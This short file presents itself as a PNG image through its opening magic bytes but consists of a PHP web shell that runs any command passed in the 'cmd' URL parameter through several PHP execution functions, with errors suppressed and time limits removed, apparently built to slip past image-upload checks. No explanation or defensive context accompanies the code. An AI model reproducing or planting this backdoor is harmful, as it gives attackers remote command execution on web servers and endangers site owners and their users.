‰PNG

<?php
@error_reporting(0);
@set_time_limit(0);
@ini_set('max_execution_time', 0);
if(isset($_GET['cmd'])) {
    $c = $_GET['cmd'];
    if(function_exists('system')) { @system($c); }
    elseif(function_exists('exec')) { @exec($c, $o); echo implode("\n", $o); }
    elseif(function_exists('shell_exec')) { echo @shell_exec($c); }
    elseif(function_exists('passthru')) { @passthru($c); }
    elseif(function_exists('popen')) { $p = @popen($c, 'r'); while(!@feof($p)) { echo @fread($p, 4096); } @pclose($p); }
}
__halt_compiler(); ?>